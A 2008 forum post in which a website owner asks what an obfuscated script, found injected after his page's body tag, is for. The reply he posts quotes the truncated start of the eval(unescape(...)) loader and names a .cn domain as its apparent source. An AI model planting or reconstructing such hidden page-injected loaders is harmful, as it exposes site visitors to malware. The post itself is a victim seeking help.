Posted by John Clayton on 01/07/08 19:28

>> Looking at the source code there is some stuff in comments I never put in
>> there.
>> I'll remove it in next day or so, but before I do can any one please tell
> me
>> what it might be?
>>
>> Our hosting company (Netcetera) has just yesterday altered ftp access
> codes
>> for both sites as part of their "security review".
>> Seems to me this one's been hacked into.
>> Can anyone guess to what purpose please?
>> Many thanks.
>>
>> The code is just after <body bgcolor= , which is now repeated - as is
>> this
>> "cuckoo code". this starts off "var msg=314, d=document
>>
>> This page is;- www.ossettmouldings.com/default.htm
>
> I don't think anyone here is going to be in a hurry to open this page.
> Looks like they've added a little javascript. Posting the offending code
> would be better.
> Vince
>
>
Vince,
As you say, it looks to me also like a bit of script. It reads;-

<!--
var msg=314,d=document;
eval (unescape ('%20%77%69%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%- this
continues for absolutely ages and concludes with ;))
//-->

The "cookie" appears to originate from ;- tanikinata.cn

I'm just wondering what it's doiong/ attempting to do?

[Back to original message]